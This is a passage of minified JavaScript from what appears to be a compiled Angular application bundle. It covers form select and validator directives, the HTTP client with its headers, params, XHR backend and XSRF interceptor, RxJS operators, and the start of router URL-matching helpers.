function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["select","formControlName","",3,"multiple",""],["select","formControl","",3,"multiple",""],["select","ngModel","",3,"multiple",""]],hostBindings:function(e,i){1&e&&he("change",function(r){return i.onChange(r.target.value)})("blur",function(){return i.onTouched()})},inputs:{compareWith:"compareWith"},features:[ki([Vde]),ci]}),t})(),pm=(()=>{class t{constructor(e,i,n){this._element=e,this._renderer=i,this._select=n,this._select&&(this.id=this._select._registerOption())}set ngValue(e){null!=this._select&&(this._select._optionMap.set(this.id,e),this._setElementValue(RN(this.id,e)),this._select.writeValue(this._select.value))}set value(e){this._setElementValue(e),this._select&&this._select.writeValue(this._select.value)}_setElementValue(e){this._renderer.setProperty(this._element.nativeElement,"value",e)}ngOnDestroy(){this._select&&(this._select._optionMap.delete(this.id),this._select.writeValue(this._select.value))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(Ed,9))},t.\u0275dir=Ot({type:t,selectors:[["option"]],inputs:{ngValue:"ngValue",value:"value"}}),t})();const Hde={provide:Ls,useExisting:ja(()=>dx),multi:!0};function SN(t,a){return null==t?`${a}`:("string"==typeof a&&(a=`'${a}'`),a&&"object"==typeof a&&(a="Object"),`${t}: ${a}`.slice(0,50))}let dx=(()=>{class t extends cg{constructor(){super(...arguments),this._optionMap=new Map,this._idCounter=0,this._compareWith=Object.is}set compareWith(e){this._compareWith=e}writeValue(e){let i;if(this.value=e,Array.isArray(e)){const n=e.map(r=>this._getOptionId(r));i=(r,c)=>{r._setSelected(n.indexOf(c.toString())>-1)}}else i=(n,r)=>{n._setSelected(!1)};this._optionMap.forEach(i)}registerOnChange(e){this.onChange=i=>{const n=[],r=i.selectedOptions;if(void 0!==r){const c=r;for(let d=0;d<c.length;d++){const k=this._getOptionValue(c[d].value);n.push(k)}}else{const c=i.options;for(let d=0;d<c.length;d++){const T=c[d];if(T.selected){const k=this._getOptionValue(T.value);n.push(k)}}}this.value=n,e(n)}}_registerOption(e){const i=(this._idCounter++).toString();return this._optionMap.set(i,e),i}_getOptionId(e){for(const i of Array.from(this._optionMap.keys()))if(this._compareWith(this._optionMap.get(i)._value,e))return i;return null}_getOptionValue(e){const i=function Ude(t){return t.split(":")[0]}(e);return this._optionMap.has(i)?this._optionMap.get(i)._value:e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["select","multiple","","formControlName",""],["select","multiple","","formControl",""],["select","multiple","","ngModel",""]],hostBindings:function(e,i){1&e&&he("change",function(r){return i.onChange(r.target)})("blur",function(){return i.onTouched()})},inputs:{compareWith:"compareWith"},features:[ki([Hde]),ci]}),t})(),_m=(()=>{class t{constructor(e,i,n){this._element=e,this._renderer=i,this._select=n,this._select&&(this.id=this._select._registerOption(this))}set ngValue(e){null!=this._select&&(this._value=e,this._setElementValue(SN(this.id,e)),this._select.writeValue(this._select.value))}set value(e){this._select?(this._value=e,this._setElementValue(SN(this.id,e)),this._select.writeValue(this._select.value)):this._setElementValue(e)}_setElementValue(e){this._renderer.setProperty(this._element.nativeElement,"value",e)}_setSelected(e){this._renderer.setProperty(this._element.nativeElement,"selected",e)}ngOnDestroy(){this._select&&(this._select._optionMap.delete(this.id),this._select.writeValue(this._select.value))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(dx,9))},t.\u0275dir=Ot({type:t,selectors:[["option"]],inputs:{ngValue:"ngValue",value:"value"}}),t})();function PN(t){return"number"==typeof t?t:parseFloat(t)}let dg=(()=>{class t{constructor(){this._validator=E4}ngOnChanges(e){if(this.inputName in e){const i=this.normalizeInput(e[this.inputName].currentValue);this._enabled=this.enabled(i),this._validator=this._enabled?this.createValidator(i):E4,this._onChange&&this._onChange()}}validate(e){return this._validator(e)}registerOnValidatorChange(e){this._onChange=e}enabled(e){return null!=e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,features:[sa]}),t})();const qde={provide:ys,useExisting:ja(()=>mx),multi:!0};let mx=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="max",this.normalizeInput=e=>PN(e),this.createValidator=e=>HO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","max","","formControlName",""],["input","type","number","max","","formControl",""],["input","type","number","max","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("max",i._enabled?i.max:null)},inputs:{max:"max"},features:[ki([qde]),ci]}),t})();const Gde={provide:ys,useExisting:ja(()=>Dd),multi:!0};let Dd=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="min",this.normalizeInput=e=>PN(e),this.createValidator=e=>BO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","min","","formControlName",""],["input","type","number","min","","formControl",""],["input","type","number","min","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("min",i._enabled?i.min:null)},inputs:{min:"min"},features:[ki([Gde]),ci]}),t})();const jde={provide:ys,useExisting:ja(()=>gm),multi:!0};let gm=(()=>{class t extends dg{constructor(){super(...arguments),this.inputName="required",this.normalizeInput=Eh,this.createValidator=e=>UO}enabled(e){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","required","","formControlName","",3,"type","checkbox"],["","required","","formControl","",3,"type","checkbox"],["","required","","ngModel","",3,"type","checkbox"]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("required",i._enabled?"":null)},inputs:{required:"required"},features:[ki([jde]),ci]}),t})(),WN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[DN]}),t})(),z4=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})(),ux=(()=>{class t{static withConfig(e){return{ngModule:t,providers:[{provide:rx,useValue:e.warnOnNgModelWithFormControl}]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})();function Bi(...t){return Sa(t,Vn(t))}function Rh(t,a){return ie(a)?Ut(t,a,1):Ut(t,1)}function Dn(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>t.call(a,r,n++)&&i.next(r)))})}class FN{}class VN{}class du{constructor(a){this.normalizedNames=new Map,this.lazyUpdate=null,a?this.lazyInit="string"==typeof a?()=>{this.headers=new Map,a.split("\n").forEach(e=>{const i=e.indexOf(":");if(i>0){const n=e.slice(0,i),r=n.toLowerCase(),c=e.slice(i+1).trim();this.maybeSetNormalizedName(n,r),this.headers.has(r)?this.headers.get(r).push(c):this.headers.set(r,[c])}})}:()=>{this.headers=new Map,Object.keys(a).forEach(e=>{let i=a[e];const n=e.toLowerCase();"string"==typeof i&&(i=[i]),i.length>0&&(this.headers.set(n,i),this.maybeSetNormalizedName(e,n))})}:this.headers=new Map}has(a){return this.init(),this.headers.has(a.toLowerCase())}get(a){this.init();const e=this.headers.get(a.toLowerCase());return e&&e.length>0?e[0]:null}keys(){return this.init(),Array.from(this.normalizedNames.values())}getAll(a){return this.init(),this.headers.get(a.toLowerCase())||null}append(a,e){return this.clone({name:a,value:e,op:"a"})}set(a,e){return this.clone({name:a,value:e,op:"s"})}delete(a,e){return this.clone({name:a,value:e,op:"d"})}maybeSetNormalizedName(a,e){this.normalizedNames.has(e)||this.normalizedNames.set(e,a)}init(){this.lazyInit&&(this.lazyInit instanceof du?this.copyFrom(this.lazyInit):this.lazyInit(),this.lazyInit=null,this.lazyUpdate&&(this.lazyUpdate.forEach(a=>this.applyUpdate(a)),this.lazyUpdate=null))}copyFrom(a){a.init(),Array.from(a.headers.keys()).forEach(e=>{this.headers.set(e,a.headers.get(e)),this.normalizedNames.set(e,a.normalizedNames.get(e))})}clone(a){const e=new du;return e.lazyInit=this.lazyInit&&this.lazyInit instanceof du?this.lazyInit:this,e.lazyUpdate=(this.lazyUpdate||[]).concat([a]),e}applyUpdate(a){const e=a.name.toLowerCase();switch(a.op){case"a":case"s":let i=a.value;if("string"==typeof i&&(i=[i]),0===i.length)return;this.maybeSetNormalizedName(a.name,e);const n=("a"===a.op?this.headers.get(e):void 0)||[];n.push(...i),this.headers.set(e,n);break;case"d":const r=a.value;if(r){let c=this.headers.get(e);if(!c)return;c=c.filter(d=>-1===r.indexOf(d)),0===c.length?(this.headers.delete(e),this.normalizedNames.delete(e)):this.headers.set(e,c)}else this.headers.delete(e),this.normalizedNames.delete(e)}}forEach(a){this.init(),Array.from(this.normalizedNames.keys()).forEach(e=>a(this.normalizedNames.get(e),this.headers.get(e)))}}class Zde{encodeKey(a){return BN(a)}encodeValue(a){return BN(a)}decodeKey(a){return decodeURIComponent(a)}decodeValue(a){return decodeURIComponent(a)}}const tme=/%(\d[a-f0-9])/gi,ime={40:"@","3A":":",24:"$","2C":",","3B":";","3D":"=","3F":"?","2F":"/"};function BN(t){return encodeURIComponent(t).replace(tme,(a,e)=>{var i;return null!==(i=ime[e])&&void 0!==i?i:a})}function W4(t){return`${t}`}class np{constructor(a={}){if(this.updates=null,this.cloneFrom=null,this.encoder=a.encoder||new Zde,a.fromString){if(a.fromObject)throw new Error("Cannot specify both fromString and fromObject.");this.map=function eme(t,a){const e=new Map;return t.length>0&&t.replace(/^\?/,"").split("&").forEach(n=>{const r=n.indexOf("="),[c,d]=-1==r?[a.decodeKey(n),""]:[a.decodeKey(n.slice(0,r)),a.decodeValue(n.slice(r+1))],T=e.get(c)||[];T.push(d),e.set(c,T)}),e}(a.fromString,this.encoder)}else a.fromObject?(this.map=new Map,Object.keys(a.fromObject).forEach(e=>{const i=a.fromObject[e],n=Array.isArray(i)?i.map(W4):[W4(i)];this.map.set(e,n)})):this.map=null}has(a){return this.init(),this.map.has(a)}get(a){this.init();const e=this.map.get(a);return e?e[0]:null}getAll(a){return this.init(),this.map.get(a)||null}keys(){return this.init(),Array.from(this.map.keys())}append(a,e){return this.clone({param:a,value:e,op:"a"})}appendAll(a){const e=[];return Object.keys(a).forEach(i=>{const n=a[i];Array.isArray(n)?n.forEach(r=>{e.push({param:i,value:r,op:"a"})}):e.push({param:i,value:n,op:"a"})}),this.clone(e)}set(a,e){return this.clone({param:a,value:e,op:"s"})}delete(a,e){return this.clone({param:a,value:e,op:"d"})}toString(){return this.init(),this.keys().map(a=>{const e=this.encoder.encodeKey(a);return this.map.get(a).map(i=>e+"="+this.encoder.encodeValue(i)).join("&")}).filter(a=>""!==a).join("&")}clone(a){const e=new np({encoder:this.encoder});return e.cloneFrom=this.cloneFrom||this,e.updates=(this.updates||[]).concat(a),e}init(){null===this.map&&(this.map=new Map),null!==this.cloneFrom&&(this.cloneFrom.init(),this.cloneFrom.keys().forEach(a=>this.map.set(a,this.cloneFrom.map.get(a))),this.updates.forEach(a=>{switch(a.op){case"a":case"s":const e=("a"===a.op?this.map.get(a.param):void 0)||[];e.push(W4(a.value)),this.map.set(a.param,e);break;case"d":if(void 0===a.value){this.map.delete(a.param);break}{let i=this.map.get(a.param)||[];const n=i.indexOf(W4(a.value));-1!==n&&i.splice(n,1),i.length>0?this.map.set(a.param,i):this.map.delete(a.param)}}}),this.cloneFrom=this.updates=null)}}class ame{constructor(){this.map=new Map}set(a,e){return this.map.set(a,e),this}get(a){return this.map.has(a)||this.map.set(a,a.defaultValue()),this.map.get(a)}delete(a){return this.map.delete(a),this}has(a){return this.map.has(a)}keys(){return this.map.keys()}}function HN(t){return"undefined"!=typeof ArrayBuffer&&t instanceof ArrayBuffer}function UN(t){return"undefined"!=typeof Blob&&t instanceof Blob}function qN(t){return"undefined"!=typeof FormData&&t instanceof FormData}class Cy{constructor(a,e,i,n){let r;if(this.url=e,this.body=null,this.reportProgress=!1,this.withCredentials=!1,this.responseType="json",this.method=a.toUpperCase(),function nme(t){switch(t){case"DELETE":case"GET":case"HEAD":case"OPTIONS":case"JSONP":return!1;default:return!0}}(this.method)||n?(this.body=void 0!==i?i:null,r=n):r=i,r&&(this.reportProgress=!!r.reportProgress,this.withCredentials=!!r.withCredentials,r.responseType&&(this.responseType=r.responseType),r.headers&&(this.headers=r.headers),r.context&&(this.context=r.context),r.params&&(this.params=r.params)),this.headers||(this.headers=new du),this.context||(this.context=new ame),this.params){const c=this.params.toString();if(0===c.length)this.urlWithParams=e;else{const d=e.indexOf("?");this.urlWithParams=e+(-1===d?"?":d<e.length-1?"&":"")+c}}else this.params=new np,this.urlWithParams=e}serializeBody(){return null===this.body?null:HN(this.body)||UN(this.body)||qN(this.body)||function ome(t){return"undefined"!=typeof URLSearchParams&&t instanceof URLSearchParams}(this.body)||"string"==typeof this.body?this.body:this.body instanceof np?this.body.toString():"object"==typeof this.body||"boolean"==typeof this.body||Array.isArray(this.body)?JSON.stringify(this.body):this.body.toString()}detectContentTypeHeader(){return null===this.body||qN(this.body)?null:UN(this.body)?this.body.type||null:HN(this.body)?null:"string"==typeof this.body?"text/plain":this.body instanceof np?"application/x-www-form-urlencoded;charset=UTF-8":"object"==typeof this.body||"number"==typeof this.body||"boolean"==typeof this.body?"application/json":null}clone(a={}){var e;const i=a.method||this.method,n=a.url||this.url,r=a.responseType||this.responseType,c=void 0!==a.body?a.body:this.body,d=void 0!==a.withCredentials?a.withCredentials:this.withCredentials,T=void 0!==a.reportProgress?a.reportProgress:this.reportProgress;let k=a.headers||this.headers,q=a.params||this.params;const Y=null!==(e=a.context)&&void 0!==e?e:this.context;return void 0!==a.setHeaders&&(k=Object.keys(a.setHeaders).reduce((te,pe)=>te.set(pe,a.setHeaders[pe]),k)),a.setParams&&(q=Object.keys(a.setParams).reduce((te,pe)=>te.set(pe,a.setParams[pe]),q)),new Cy(i,n,c,{params:q,headers:k,context:Y,reportProgress:T,responseType:r,withCredentials:d})}}var bs=(()=>((bs=bs||{})[bs.Sent=0]="Sent",bs[bs.UploadProgress=1]="UploadProgress",bs[bs.ResponseHeader=2]="ResponseHeader",bs[bs.DownloadProgress=3]="DownloadProgress",bs[bs.Response=4]="Response",bs[bs.User=5]="User",bs))();class hx{constructor(a,e=200,i="OK"){this.headers=a.headers||new du,this.status=void 0!==a.status?a.status:e,this.statusText=a.statusText||i,this.url=a.url||null,this.ok=this.status>=200&&this.status<300}}class fx extends hx{constructor(a={}){super(a),this.type=bs.ResponseHeader}clone(a={}){return new fx({headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class F4 extends hx{constructor(a={}){super(a),this.type=bs.Response,this.body=void 0!==a.body?a.body:null}clone(a={}){return new F4({body:void 0!==a.body?a.body:this.body,headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class GN extends hx{constructor(a){super(a,0,"Unknown Error"),this.name="HttpErrorResponse",this.ok=!1,this.message=this.status>=200&&this.status<300?`Http failure during parsing for ${a.url||"(unknown url)"}`:`Http failure response for ${a.url||"(unknown url)"}: ${a.status} ${a.statusText}`,this.error=a.error||null}}function px(t,a){return{body:a,headers:t.headers,context:t.context,observe:t.observe,params:t.params,reportProgress:t.reportProgress,responseType:t.responseType,withCredentials:t.withCredentials}}let op=(()=>{class t{constructor(e){this.handler=e}request(e,i,n={}){let r;if(e instanceof Cy)r=e;else{let T,k;T=n.headers instanceof du?n.headers:new du(n.headers),n.params&&(k=n.params instanceof np?n.params:new np({fromObject:n.params})),r=new Cy(e,i,void 0!==n.body?n.body:null,{headers:T,context:n.context,params:k,reportProgress:n.reportProgress,responseType:n.responseType||"json",withCredentials:n.withCredentials})}const c=Bi(r).pipe(Rh(T=>this.handler.handle(T)));if(e instanceof Cy||"events"===n.observe)return c;const d=c.pipe(Dn(T=>T instanceof F4));switch(n.observe||"body"){case"body":switch(r.responseType){case"arraybuffer":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof ArrayBuffer))throw new Error("Response is not an ArrayBuffer.");return T.body}));case"blob":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof Blob))throw new Error("Response is not a Blob.");return T.body}));case"text":return d.pipe(Xe(T=>{if(null!==T.body&&"string"!=typeof T.body)throw new Error("Response is not a string.");return T.body}));default:return d.pipe(Xe(T=>T.body))}case"response":return d;default:throw new Error(`Unreachable: unhandled observe type ${n.observe}}`)}}delete(e,i={}){return this.request("DELETE",e,i)}get(e,i={}){return this.request("GET",e,i)}head(e,i={}){return this.request("HEAD",e,i)}jsonp(e,i){return this.request("JSONP",e,{params:(new np).append(i,"JSONP_CALLBACK"),observe:"body",responseType:"json"})}options(e,i={}){return this.request("OPTIONS",e,i)}patch(e,i,n={}){return this.request("PATCH",e,px(n,i))}post(e,i,n={}){return this.request("POST",e,px(n,i))}put(e,i,n={}){return this.request("PUT",e,px(n,i))}}return t.\u0275fac=function(e){return new(e||t)(At(FN))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class jN{constructor(a,e){this.next=a,this.interceptor=e}handle(a){return this.interceptor.intercept(a,this.next)}}const QN=new ni("HTTP_INTERCEPTORS");let rme=(()=>{class t{intercept(e,i){return i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const sme=/^\)\]\}',?\n/;let $N=(()=>{class t{constructor(e){this.xhrFactory=e}handle(e){if("JSONP"===e.method)throw new Error("Attempted to construct Jsonp request without HttpClientJsonpModule installed.");return new G(i=>{const n=this.xhrFactory.build();if(n.open(e.method,e.urlWithParams),e.withCredentials&&(n.withCredentials=!0),e.headers.forEach((pe,Re)=>n.setRequestHeader(pe,Re.join(","))),e.headers.has("Accept")||n.setRequestHeader("Accept","application/json, text/plain, */*"),!e.headers.has("Content-Type")){const pe=e.detectContentTypeHeader();null!==pe&&n.setRequestHeader("Content-Type",pe)}if(e.responseType){const pe=e.responseType.toLowerCase();n.responseType="json"!==pe?pe:"text"}const r=e.serializeBody();let c=null;const d=()=>{if(null!==c)return c;const pe=n.statusText||"OK",Re=new du(n.getAllResponseHeaders()),Fe=function cme(t){return"responseURL"in t&&t.responseURL?t.responseURL:/^X-Request-URL:/m.test(t.getAllResponseHeaders())?t.getResponseHeader("X-Request-URL"):null}(n)||e.url;return c=new fx({headers:Re,status:n.status,statusText:pe,url:Fe}),c},T=()=>{let{headers:pe,status:Re,statusText:Fe,url:Ne}=d(),et=null;204!==Re&&(et=void 0===n.response?n.responseText:n.response),0===Re&&(Re=et?200:0);let ut=Re>=200&&Re<300;if("json"===e.responseType&&"string"==typeof et){const Ze=et;et=et.replace(sme,"");try{et=""!==et?JSON.parse(et):null}catch(yt){et=Ze,ut&&(ut=!1,et={error:yt,text:et})}}ut?(i.next(new F4({body:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0})),i.complete()):i.error(new GN({error:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0}))},k=pe=>{const{url:Re}=d(),Fe=new GN({error:pe,status:n.status||0,statusText:n.statusText||"Unknown Error",url:Re||void 0});i.error(Fe)};let q=!1;const Y=pe=>{q||(i.next(d()),q=!0);let Re={type:bs.DownloadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),"text"===e.responseType&&!!n.responseText&&(Re.partialText=n.responseText),i.next(Re)},te=pe=>{let Re={type:bs.UploadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),i.next(Re)};return n.addEventListener("load",T),n.addEventListener("error",k),n.addEventListener("timeout",k),n.addEventListener("abort",k),e.reportProgress&&(n.addEventListener("progress",Y),null!==r&&n.upload&&n.upload.addEventListener("progress",te)),n.send(r),i.next({type:bs.Sent}),()=>{n.removeEventListener("error",k),n.removeEventListener("abort",k),n.removeEventListener("load",T),n.removeEventListener("timeout",k),e.reportProgress&&(n.removeEventListener("progress",Y),null!==r&&n.upload&&n.upload.removeEventListener("progress",te)),n.readyState!==n.DONE&&n.abort()}})}}return t.\u0275fac=function(e){return new(e||t)(At(AP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const _x=new ni("XSRF_COOKIE_NAME"),gx=new ni("XSRF_HEADER_NAME");class KN{}let lme=(()=>{class t{constructor(e,i,n){this.doc=e,this.platform=i,this.cookieName=n,this.lastCookieString="",this.lastToken=null,this.parseCount=0}getToken(){if("server"===this.platform)return null;const e=this.doc.cookie||"";return e!==this.lastCookieString&&(this.parseCount++,this.lastToken=uP(e,this.cookieName),this.lastCookieString=e),this.lastToken}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(lm),At(_x))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cx=(()=>{class t{constructor(e,i){this.tokenService=e,this.headerName=i}intercept(e,i){const n=e.url.toLowerCase();if("GET"===e.method||"HEAD"===e.method||n.startsWith("http://")||n.startsWith("https://"))return i.handle(e);const r=this.tokenService.getToken();return null!==r&&!e.headers.has(this.headerName)&&(e=e.clone({headers:e.headers.set(this.headerName,r)})),i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(KN),At(gx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),dme=(()=>{class t{constructor(e,i){this.backend=e,this.injector=i,this.chain=null}handle(e){if(null===this.chain){const i=this.injector.get(QN,[]);this.chain=i.reduceRight((n,r)=>new jN(n,r),this.backend)}return this.chain.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(VN),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),mme=(()=>{class t{static disable(){return{ngModule:t,providers:[{provide:Cx,useClass:rme}]}}static withOptions(e={}){return{ngModule:t,providers:[e.cookieName?{provide:_x,useValue:e.cookieName}:[],e.headerName?{provide:gx,useValue:e.headerName}:[]]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Cx,{provide:QN,useExisting:Cx,multi:!0},{provide:KN,useClass:lme},{provide:_x,useValue:"XSRF-TOKEN"},{provide:gx,useValue:"X-XSRF-TOKEN"}]}),t})(),ume=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[op,{provide:FN,useClass:dme},$N,{provide:VN,useExisting:$N}],imports:[mme.withOptions({cookieName:"XSRF-TOKEN",headerName:"X-XSRF-TOKEN"})]}),t})(),hme=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class zs extends J{constructor(a){super(),this._value=a}get value(){return this.getValue()}_subscribe(a){const e=super._subscribe(a);return!e.closed&&a.next(this._value),e}getValue(){const{hasError:a,thrownError:e,_value:i}=this;if(a)throw e;return this._throwIfClosed(),i}next(a){super.next(this._value=a)}}const V4=j(t=>function(){t(this),this.name="EmptyError",this.message="no elements in sequence"});function mg(...t){const a=Vn(t),e=yo(t),{args:i,keys:n}=LO(t);if(0===i.length)return Sa([],a);const r=new G(function fme(t,a,e=A){return i=>{XN(a,()=>{const{length:n}=t,r=new Array(n);let c=n,d=n;for(let T=0;T<n;T++)XN(a,()=>{const k=Sa(t[T],a);let q=!1;k.subscribe(Ae(i,Y=>{r[T]=Y,q||(q=!0,d--),d||i.next(e(r.slice()))},()=>{--c||i.complete()}))},i)},i)}}(i,a,n?c=>zO(n,c):A));return e?r.pipe(Q6(e)):r}function XN(t,a,e){t?$t(e,t,a):a()}function ug(...t){return function pme(){return Yt(1)}()(Sa(t,Vn(t)))}function rp(t){return new G(a=>{pn(t()).subscribe(a)})}function b1(t,a){const e=ie(t)?t:()=>t,i=n=>n.error(e());return new G(a?n=>a.schedule(i,0,n):i)}function yx(){return Ie((t,a)=>{let e=null;t._refCount++;const i=Ae(a,void 0,void 0,void 0,()=>{if(!t||t._refCount<=0||0<--t._refCount)return void(e=null);const n=t._connection,r=e;e=null,n&&(!r||n===r)&&n.unsubscribe(),a.unsubscribe()});t.subscribe(i),i.closed||(e=t.connect())})}class bx extends G{constructor(a,e){super(),this.source=a,this.subjectFactory=e,this._subject=null,this._refCount=0,this._connection=null,ue(a)&&(this.lift=a.lift)}_subscribe(a){return this.getSubject().subscribe(a)}getSubject(){const a=this._subject;return(!a||a.isStopped)&&(this._subject=this.subjectFactory()),this._subject}_teardown(){this._refCount=0;const{_connection:a}=this;this._subject=this._connection=null,null==a||a.unsubscribe()}connect(){let a=this._connection;if(!a){a=this._connection=new I;const e=this.getSubject();a.add(this.source.subscribe(Ae(e,void 0,()=>{this._teardown(),e.complete()},i=>{this._teardown(),e.error(i)},()=>this._teardown()))),a.closed&&(this._connection=null,a=I.EMPTY)}return a}refCount(){return yx()(this)}}function Ur(t,a){return Ie((e,i)=>{let n=null,r=0,c=!1;const d=()=>c&&!n&&i.complete();e.subscribe(Ae(i,T=>{null==n||n.unsubscribe();let k=0;const q=r++;pn(t(T,q)).subscribe(n=Ae(i,Y=>i.next(a?a(T,Y,q,k++):Y),()=>{n=null,d()}))},()=>{c=!0,d()}))})}function Cn(t){return t<=0?()=>ha:Ie((a,e)=>{let i=0;a.subscribe(Ae(e,n=>{++i<=t&&(e.next(n),t<=i&&e.complete())}))})}function Ro(...t){const a=Vn(t);return Ie((e,i)=>{(a?ug(t,e,a):ug(t,e)).subscribe(i)})}function B4(t){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>{i||e.next(t),e.complete()}))})}function YN(t=_me){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>i?e.complete():e.error(t())))})}function _me(){return new V4}function xd(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):A,Cn(1),e?B4(a):YN(()=>new V4))}function qr(t,a,e){const i=ie(t)||a||e?{next:t,error:a,complete:e}:t;return i?Ie((n,r)=>{var c;null===(c=i.subscribe)||void 0===c||c.call(i);let d=!0;n.subscribe(Ae(r,T=>{var k;null===(k=i.next)||void 0===k||k.call(i,T),r.next(T)},()=>{var T;d=!1,null===(T=i.complete)||void 0===T||T.call(i),r.complete()},T=>{var k;d=!1,null===(k=i.error)||void 0===k||k.call(i,T),r.error(T)},()=>{var T,k;d&&(null===(T=i.unsubscribe)||void 0===T||T.call(i)),null===(k=i.finalize)||void 0===k||k.call(i)}))}):A}function Sh(t){return Ie((a,e)=>{let r,i=null,n=!1;i=a.subscribe(Ae(e,void 0,void 0,c=>{r=pn(t(c,Sh(t)(a))),i?(i.unsubscribe(),i=null,r.subscribe(e)):n=!0})),n&&(i.unsubscribe(),i=null,r.subscribe(e))})}function gme(t,a,e,i,n){return(r,c)=>{let d=e,T=a,k=0;r.subscribe(Ae(c,q=>{const Y=k++;T=d?t(T,q,Y):(d=!0,q),i&&c.next(T)},n&&(()=>{d&&c.next(T),c.complete()})))}}function JN(t,a){return Ie(gme(t,a,arguments.length>=2,!0))}function Mx(t){return t<=0?()=>ha:Ie((a,e)=>{let i=[];a.subscribe(Ae(e,n=>{i.push(n),t<i.length&&i.shift()},()=>{for(const n of i)e.next(n);e.complete()},void 0,()=>{i=null}))})}function ZN(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):A,Mx(1),e?B4(a):YN(()=>new V4))}function eL(t,a=!1){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{const c=t(r,n++);(c||a)&&i.next(r),!c&&i.complete()}))})}function H4(t){return Xe(()=>t)}function U4(t){return Ie((a,e)=>{try{a.subscribe(e)}finally{e.add(t)}})}const Nn="primary",yy=Symbol("RouteTitle");class Cme{constructor(a){this.params=a||{}}has(a){return Object.prototype.hasOwnProperty.call(this.params,a)}get(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e[0]:e}return null}getAll(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e:[e]}return[]}get keys(){return Object.keys(this.params)}}function M1(t){return new Cme(t)}function yme(t,a,e){const i=e.path.split("/");if(i.length>t.length||"full"===e.pathMatch&&(a.hasChildren()||i.length<t.length))return null;const n={};for(let r=0;r<i.length;r++){const c=i[r],d=t[r];if(c.startsWith(":"))n[c.substring(1)]=d;else if(c!==d.path)return null}return{consumed:t.slice(0,i.length),posParams:n}}function mu(t,a){const e=t?Object.keys(t):void 0,i=a?Object.keys(a):void 0;if(!e||!i||e.length!=i.length)return!1;let n;for(let r=0;r<e.length;r++)if(n=e[r],!tL(t[n],a[n]))return!1;return!0}function tL(t,a){if(Array.isArray(t)&&Array.isArray(a)){if(t.length!==a.length)return!1;const e=[...t].sort(),i=[...a].sort();return e.every((n,r)=>i[r]===n)}return t===a}function iL(t){return Array.prototype.concat.apply([],t)}function aL(t){return t.length>0?t[t.length-1]:null}function oc(t,a){for(const e in t)t.hasOwnProperty(e)&&a(t[e],e)}function sp(t){return fD(t)?t:qC(t)?Sa(Promise.resolve(t)):Bi(t)}const vme={exact:function rL(t,a,e){if(!fg(t.segments,a.segments)||!q4(t.segments,a.segments,e)||t.numberOfChildren!==a.numberOfChildren)return!1;for(const i in a.children)if(!t.children[i]||!rL(t.children[i],a.children[i],e))return!1;return!0},subset:sL},nL={exact:function Ame(t,a){return mu(t,a)},subset:function Tme(t,a){return Object.keys(a).length<=Object.keys(t).length&&Object.keys(a).every(e=>tL(t[e],a[e]))},ignored:()=>!0};function oL(t,a,e){return 